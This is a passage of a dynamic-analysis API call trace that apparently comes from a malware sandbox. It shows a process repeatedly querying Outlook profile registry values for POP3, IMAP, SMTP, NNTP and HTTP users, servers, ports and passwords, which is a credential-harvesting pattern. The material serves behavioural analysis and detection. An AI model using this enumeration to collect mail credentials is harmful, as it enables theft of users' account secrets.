returned 0x2 [0249.320] RegCloseKey (hKey=0x95c) returned 0x0 [0249.320] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.321] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.321] RegCloseKey (hKey=0x95c) returned 0x0 [0249.321] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.321] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.321] RegCloseKey (hKey=0x95c) returned 0x0 [0249.321] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.321] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.321] RegCloseKey (hKey=0x95c) returned 0x0 [0249.321] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.321] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.321] RegCloseKey (hKey=0x95c) returned 0x0 [0249.321] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.321] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.321] RegCloseKey (hKey=0x95c) returned 0x0 [0249.321] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.321] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.321] RegCloseKey (hKey=0x95c) returned 0x0 [0249.321] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.321] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.321] RegCloseKey (hKey=0x95c) returned 0x0 [0249.321] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.321] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.321] RegCloseKey (hKey=0x95c) returned 0x0 [0249.321] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.321] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.321] RegCloseKey (hKey=0x95c) returned 0x0 [0249.322] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.322] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.322] RegCloseKey (hKey=0x95c) returned 0x0 [0249.322] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.322] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.322] RegCloseKey (hKey=0x95c) returned 0x0 [0249.322] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.322] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.322] RegCloseKey (hKey=0x95c) returned 0x0 [0249.322] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.322] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.322] RegCloseKey (hKey=0x95c) returned 0x0 [0249.322] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.322] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.322] RegCloseKey (hKey=0x95c) returned 0x0 [0249.322] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.322] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.322] RegCloseKey (hKey=0x95c) returned 0x0 [0249.322] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.322] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.322] RegCloseKey (hKey=0x95c) returned 0x0 [0249.322] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.322] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.322] RegCloseKey (hKey=0x95c) returned 0x0 [0249.322] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.322] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.322] RegCloseKey (hKey=0x95c) returned 0x0 [0249.323] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.323] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.323] RegCloseKey (hKey=0x95c) returned 0x0 [0249.323] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.323] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.323] RegCloseKey (hKey=0x95c) returned 0x0 [0249.323] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.323] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.323] RegCloseKey (hKey=0x95c) returned 0x0 [0249.323] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.323] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.323] RegCloseKey (hKey=0x95c) returned 0x0 [0249.323] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.323] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.323] RegCloseKey (hKey=0x95c) returned 0x0 [0249.323] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.323] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.323] RegCloseKey (hKey=0x95c) returned 0x0 [0249.323] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.323] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.323] RegCloseKey (hKey=0x95c) returned 0x0 [0249.323] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.323] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.323] RegCloseKey (hKey=0x95c) returned 0x0 [0249.323] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.323] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.323] RegCloseKey (hKey=0x95c) returned 0x0 [0249.324] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.324] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.324] RegCloseKey (hKey=0x95c) returned 0x0 [0249.324] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.324] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.324] RegCloseKey (hKey=0x95c) returned 0x0 [0249.324] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.324] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.324] RegCloseKey (hKey=0x95c) returned 0x0 [0249.324] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.324] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.324] RegCloseKey (hKey=0x95c) returned 0x0 [0249.324] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.324] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.324] RegCloseKey (hKey=0x95c) returned 0x0 [0249.324] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.324] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.324] RegCloseKey (hKey=0x95c) returned 0x0 [0249.324] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.324] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.324] RegCloseKey (hKey=0x95c) returned 0x0 [0249.324] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.324] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.324] RegCloseKey (hKey=0x95c) returned 0x0 [0249.324] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.325] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.325] RegCloseKey (hKey=0x95c) returned 0x0 [0249.325] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.325] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.325] RegCloseKey (hKey=0x95c) returned 0x0 [0249.325] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.325] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.325] RegCloseKey (hKey=0x95c) returned 0x0 [0249.325] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.325] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.325] RegCloseKey (hKey=0x95c) returned 0x0 [0249.325] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.325] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.325] RegCloseKey (hKey=0x95c) returned 0x0 [0249.325] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.325] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.325] RegCloseKey (hKey=0x95c) returned 0x0 [0249.325] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.325] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.325] RegCloseKey (hKey=0x95c) returned 0x0 [0249.325] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.325] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.325] RegCloseKey (hKey=0x95c) returned 0x0 [0249.325] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.325] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.325] RegCloseKey (hKey=0x95c) returned 0x0 [0249.325] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.325] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.326] RegCloseKey (hKey=0x95c) returned 0x0 [0249.326] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.326] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.326] RegCloseKey (hKey=0x95c) returned 0x0 [0249.326] 